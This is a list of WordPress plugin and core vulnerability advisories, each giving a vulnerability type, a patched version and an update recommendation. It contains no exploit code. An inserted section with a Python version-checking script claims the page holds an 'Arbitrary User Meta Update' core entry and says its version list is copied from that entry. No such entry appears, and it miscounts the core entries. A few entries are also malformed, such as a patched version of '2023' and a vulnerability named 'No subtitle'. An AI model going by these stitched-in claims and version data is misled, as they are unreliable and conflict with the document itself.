Plugin: KiviCare – Clinic & Patient Management System (EHR)

Vulnerability: Missing Authorization
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.23
Recommended Action: Update to version 4.0.23, or a newer patched version

Plugin: QR code MeCard/vCard generator

Vulnerability: Missing Authorization via wqm_make_url_permanent
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Product Enquiry for WooCommerce, WooCommerce product catalog

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.2.13
Recommended Action: Update to version 2.2.13, or a newer patched version

Plugin: Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2023
Recommended Action: Update to version 2023, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting via Comments
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1
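Both WordPress core entries on this page (the Arbitrary User Meta Update fix backported to 3.7.34 through 5.4.2, and the Stored XSS via Comments fix backported to 3.7.28 through 5.0.1) list one patched version per major.minor branch. The check that matters is "is my install at or above the fix for its own branch", not "is it above the lowest number in the list": 4.9.14 is numerically greater than 3.7.34 yet still vulnerable, because the 4.9 branch fix is 4.9.15. The following is an added example written for this page, not code from the advisory or from WordPress; it parses the Recommended Action line as printed above and applies the branch-aware comparison. It assumes that the listed versions are backports of a fix that first shipped in the newest listed release, so any branch newer than that is treated as fixed; the installed-version samples are constructed for illustration.

```python
"""Branch-aware patched-version check for WordPress core advisories.

Added example, not part of the original advisory. Assumes the advisory's
per-branch version list is complete and that branches newer than the
highest listed one already contain the fix.
"""
from typing import Dict, List, Optional, Sequence, Tuple

Version = Tuple[int, ...]


def parse_version(s: str) -> Version:
    """'4.9.14' -> (4, 9, 14); short versions like '5.4' stay (5, 4),
    which Python's tuple ordering treats as below (5, 4, 2)."""
    return tuple(int(p) for p in s.strip().split("."))


def branch_of(v: Version) -> Version:
    """Major.minor branch, e.g. (4, 9) for 4.9.14."""
    return v[:2]


def parse_patched_list(action_line: str) -> List[str]:
    """Pull the comma-separated version list that follows the final colon
    of a 'Recommended Action: ... : v1, v2, ...' line as printed on the page."""
    _, _, tail = action_line.rpartition(":")
    return [v.strip() for v in tail.split(",") if v.strip()]


def patched_for_branch(installed: str, patched_list: Sequence[str]) -> Optional[Version]:
    """Return the patched version for the installed version's own branch,
    or None when that branch is not in the list."""
    inst = parse_version(installed)
    for p in patched_list:
        pv = parse_version(p)
        if branch_of(pv) == branch_of(inst):
            return pv
    return None


def is_vulnerable(installed: str, patched_list: Sequence[str]) -> bool:
    """True when the installed core version lacks its branch's fix.

    Comparing against the lowest listed version alone is wrong:
    4.9.14 > 3.7.34, yet 4.9.14 predates the 4.9 branch fix (4.9.15).
    Unlisted branches older than the oldest listed one never received the
    backport and are reported vulnerable; unlisted branches newer than the
    newest listed one are assumed fixed (assumption stated in the lead-in).
    """
    inst = parse_version(installed)
    fix = patched_for_branch(installed, patched_list)
    if fix is None:
        newest = max(parse_version(p) for p in patched_list)
        return branch_of(inst) < branch_of(newest)
    return inst < fix


def audit(installed_versions: Sequence[str], patched_list: Sequence[str]) -> Dict[str, bool]:
    """Map each installed version to its vulnerable/patched verdict."""
    return {v: is_vulnerable(v, patched_list) for v in installed_versions}


# The Recommended Action line for the Arbitrary User Meta Update entry, copied
# from the advisory text above.
ADVISORY_2020 = (
    "Recommended Action: Update to one of the following versions, or a newer "
    "patched version: 3.7.34, 3.8.34, 3.9.32, 4.0.31, 4.1.31, 4.2.28, 4.3.24, "
    "4.4.23, 4.5.22, 4.6.19, 4.7.18, 4.8.14, 4.9.15, 5.0.10, 5.1.6, 5.2.7, "
    "5.3.4, 5.4.2"
)
PATCHED_2020 = parse_patched_list(ADVISORY_2020)

if __name__ == "__main__":
    # Constructed sample of installed versions, not real inventory data.
    sample = ["3.6.1", "3.7.33", "3.7.34", "4.9.14", "4.9.15", "5.4", "5.5.1"]
    for v, bad in audit(sample, PATCHED_2020).items():
        print(f"{v:>8}: {'VULNERABLE' if bad else 'patched'}")
```

Feed it the version reported by `wp core version` on each site; the same functions work for the Stored XSS via Comments entry by passing its own Recommended Action line to `parse_patched_list`.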

Plugin: Magic Embeds

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: PHP Object Injection
Patched Version: 2.3.11
Recommended Action: Update to version 2.3.11, or a newer patched version

Plugin: User Access Manager

Vulnerability: IP Spoofing
Patched Version: 2.2.18
Recommended Action: Update to version 2.2.18, or a newer patched version

Plugin: Catalyst Connect Zoho CRM Client Portal

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.6.3
Recommended Action: Update to version 0.6.3, or a newer patched version

Plugin: Image Map Pro – Drag-and-drop Builder for Interactive Images

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Manager Pro

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 6.3.0
Recommended Action: Update to version 6.3.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.0.8
Recommended Action: Update to version 8.0.8, or a newer patched version

Plugin: Custom Product Tabs Lite for WooCommerce

Vulnerability: Authenticated (Store Manager+) Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: WordPress Job Board and Recruitment Plugin – JobWP

Vulnerability: Arbitrary File Upload via ‘jobwp_upload_resume’
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Dynamic Widgets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.11
Recommended Action: Update to version 1.5.11, or a newer patched version

Plugin: Video Gallery – YouTube Gallery and Vimeo Gallery

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: WooCommerce Amazon Pay

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Podlove Subscribe button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Fluent Support – Helpdesk & Customer Support Ticket System

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Export Post Info

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WordPress Landing Pages

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Missing Authorization to Password Reset
Patched Version: 1.3.76
Recommended Action: Update to version 1.3.76, or a newer patched version

Plugin: Software License Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.8
Recommended Action: Update to version 4.4.8, or a newer patched version

Plugin: WP Ultimate Review

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Sticky Chat Widget: Chat Icons, Contact form, Email, SMS, Call Button, Click to Chat, Social Chat Widget, Sticky Chat Buttons

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: WSB Brands

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via $logo
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: JetSearch

Vulnerability: Missing Authorization
Patched Version: 3.1.2.1
Recommended Action: Update to version 3.1.2.1, or a newer patched version

Plugin: WP DS Blog Map

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All 404 Redirect to Homepage

Vulnerability: Reflected Cross-Site Scripting via tab Parameter
Patched Version: 1.21
Recommended Action: Update to version 1.21, or a newer patched version

Plugin: Wp-D3

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPSID Shortcode

Vulnerability: Open Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery Images Ape

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Elementor Addon Elements

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.12.8
Recommended Action: Update to version 1.12.8, or a newer patched version

Plugin: Dokan – Powerful WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: ARMember Premium – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Privilege Escalation
Patched Version: 5.6
Recommended Action: Update to version 5.6, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Directory Traversal
Patched Version: 5.5.4
Recommended Action: Update to version 5.5.4, or a newer patched version

Plugin: Page View Count

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Quick Event Manager

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 9.6.5
Recommended Action: Update to version 9.6.5, or a newer patched version

Plugin: Remove Schema

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 7.9.7
Recommended Action: Update to version 7.9.7, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Admin+ Cross-Site Scripting
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Social Live Chat Helpdesk – MyAlice

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Bulk Order Form for WooCommerce

Vulnerability: Authenticated (Shop manager+) Stored Cross-Site Scripting
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Jock On Air Now

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Login by Auth0

Vulnerability: Unspecified (the source records only the affected version: 3.11.2)
Patched Version: 3.11.3
Recommended Action: Update to version 3.11.3, or a newer patched version

Plugin: Simple Dropbox Upload

Vulnerability: Arbitrary File Upload
Patched Version: 1.8.8.1
Recommended Action: Update to version 1.8.8.1, or a newer patched version

Plugin: WP-EMail

Vulnerability: Spam Protection Bypass
Patched Version: 2.69.0
Recommended Action: Update to version 2.69.0, or a newer patched version

Plugin: eRoom – Zoom Meetings & Webinars

Vulnerability: Unauthorized Setting Update
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated SQL Injection
Patched Version: 2.9.55.2
Recommended Action: Update to version 2.9.55.2, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Scripting via wpf-dw-td-value class
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via mf_thankyou shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Jeeng Push Notifications

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Simple PDF Viewer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via googlepdf Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Video Conferencing with Zoom

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.0.10
Recommended Action: Update to version 4.0.10, or a newer patched version

Plugin: Simple Fields

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.11
Recommended Action: Update to version 1.4.11, or a newer patched version

Plugin: ThreeWP Email Reflector

Vulnerability: Cross-Site Scripting
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: Site Notes

Vulnerability: Cross-Site Request Forgery to Admin Note Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Event Espresso – Event Registration & Ticketing Sales

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.10.12
Recommended Action: Update to version 4.10.12, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Missing Authorization
Patched Version: 6.11
Recommended Action: Update to version 6.11, or a newer patched version

Plugin: Live Preview for Contact Form 7

Vulnerability: Missing Authorization via update_option
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Featured Image from URL (FIFU)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Twitget

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Missing Authorization
Patched Version: 8.1.17
Recommended Action: Update to version 8.1.17, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: PB SEO Friendly Images

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Limit Login Attempts Reloaded

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.17.4
Recommended Action: Update to version 2.17.4, or a newer patched version

Plugin: ark-commenteditor

Vulnerability: iframe Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Frontend File Manager Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 4.1.10
Recommended Action: Update to version 4.1.10, or a newer patched version

Plugin: SEO ALert

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Search Meter

Vulnerability: Remote Code Execution
Patched Version: 2.13.3
Recommended Action: Update to version 2.13.3, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.24
Recommended Action: Update to version 2.24, or a newer patched version

Plugin: Registration, User Profile, Membership, Content Restriction, User Directory, and Frontend Post Submission – WP User Frontend

Vulnerability: Arbitrary File Upload
Patched Version: 2.3.11
Recommended Action: Update to version 2.3.11, or a newer patched version

Plugin: WassUp Real Time Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.4.5
Recommended Action: Update to version 1.9.4.5, or a newer patched version

Plugin: Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: SQL Injection via orderby, order Parameters
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: Melhor Envio

Vulnerability: Cross-Site Request Forgery and Authenticated Settings Change
Patched Version: 2.11.20
Recommended Action: Update to version 2.11.20, or a newer patched version

Plugin: Photo Feed

Vulnerability: Reflected Cross-Site Scripting via pf-gid
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: All in One Social Lite

Vulnerability: Server-Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Unauthenticated Reflected Cross-Site Scripting via ‘code’
Patched Version: 1.0.76
Recommended Action: Update to version 1.0.76, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.36.2
Recommended Action: Update to version 2.36.2, or a newer patched version

Plugin: IFrame Admin Pages

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: SQL Injection
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: GN Publisher: Google News Compatible RSS Feeds

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Responsive Pricing Table

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.1.7
Recommended Action: Update to version 5.1.7, or a newer patched version

Plugin: WP Fusion Lite – Marketing Automation and CRM Integration for WordPress

Vulnerability: Unspecified (the source gives no vulnerability type for this entry)
Patched Version: 3.37.30
Recommended Action: Update to version 3.37.30, or a newer patched version

Plugin: WP DB Error Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Spam Free WordPress

Vulnerability: Full Path Disclosure
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.10.4
Recommended Action: Update to version 2.10.4, or a newer patched version

Plugin: FormBuilder

Vulnerability: SQL Injection
Patched Version: 1.08
Recommended Action: Update to version 1.08, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: VikRentCar Car Rental Management System

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Cross-Site Request Forgery to Plugin Settings Change/Delete, Demo Import, Directory Kit Modification/Deletion via admin_page_display
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 8.4.3
Recommended Action: Update to version 8.4.3, or a newer patched version

Plugin: Copy or Move Comments

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MapPress Maps for WordPress

Vulnerability: Insufficient Authorization to Information Disclosure
Patched Version: 2.88.16
Recommended Action: Update to version 2.88.16, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Directory Traversal
Patched Version: 1.7.15
Recommended Action: Update to version 1.7.15, or a newer patched version

Plugin: Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates)

Vulnerability: Local File Inclusion
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Aspose.PDF Exporter

Vulnerability: Arbitrary File Download
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Cross-Site Request Forgery to Field Duplication
Patched Version: 6.1.0.0
Recommended Action: Update to version 6.1.0.0, or a newer patched version

Plugin: MobiLoud – WordPress Mobile Apps – Convert your WordPress Website to Native Mobile Apps

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: Secure File Manager

Vulnerability: Remote Code Execution
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Software License Manager

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.5.0
Recommended Action: Update to version 4.5.0, or a newer patched version

Plugin: Social Proof Popups & Real-Time Notifications – Herd Effects

Vulnerability: No subtitle
Patched Version: 5.2.2
Recommended Action: Update to version 5.2.2, or a newer patched version

Plugin: Live Composer – Free WordPress Website Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.5.23
Recommended Action: Update to version 1.5.23, or a newer patched version

Plugin: bbPress Toolkit

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – Software Licensing

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: JWT Auth – WordPress JSON Web Token Authentication

Vulnerability: Algorithm Confusion
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Transposh WordPress Translation

Vulnerability: Unauthenticated Stored Cross-Site Scripting via ‘tp_translation’
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.3.11
Recommended Action: Update to version 6.3.11, or a newer patched version

Plugin: cformsII

Vulnerability: Cross-Site Scripting
Patched Version: 13.2
Recommended Action: Update to version 13.2, or a newer patched version

Plugin: ElasticPress

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: Lana Text to Image

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Social Proof Popups & Real-Time Notifications – Herd Effects

Vulnerability: Local File Inclusion
Patched Version: 5.2.1
Recommended Action: Update to version 5.2.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Theme Names
Patched Version: 3.7.12
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.12, 3.8.12, 3.9.10, 4.0.9, 4.1.9, 4.2.6, 4.3.2, 4.4.1

Plugin: Special Text Boxes

Vulnerability: Cross-Site Scripting
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Category Specific RSS feed Subscription

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Admin+ SQL Injection
Patched Version: 5.8.22
Recommended Action: Update to version 5.8.22, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 3.9.0
Recommended Action: Update to version 3.9.0, or a newer patched version

Plugin: Coming Soon Chop Chop

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kudos Donations – Easy donations and payments with Mollie

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Core: WordPress MU

Vulnerability: Remote Code Execution
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: SeoSamba for WordPress Webmasters

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: WP Custom Admin Interface

Vulnerability: Missing Authorization via wpcai_pro_notice_disable
Patched Version: 7.32
Recommended Action: Update to version 7.32, or a newer patched version

Plugin: WooCommerce Per Product Shipping

Vulnerability: Missing Authorization
Patched Version: 2.5.5
Recommended Action: Update to version 2.5.5, or a newer patched version

Plugin: WooCommerce Easy Duplicate Product

Vulnerability: Reflected Cross-Site Scripting via wedp_duplicated
Patched Version: 0.3.0.1
Recommended Action: Update to version 0.3.0.1, or a newer patched version

Plugin: Cookieless Backend Server Tracking for Google Analytics – WordPress Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Customer Reviews for WooCommerce

Vulnerability: Multiple Unprotected AJAX Actions
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: Postman SMTP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Feed | All social media in one place

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HT Event – WordPress Event Manager Plugin for Elementor

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Plugin Activation
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: WP Job Manager

Vulnerability: Missing Authorization
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Information Disclosure
Patched Version: 3.01
Recommended Action: Update to version 3.01, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

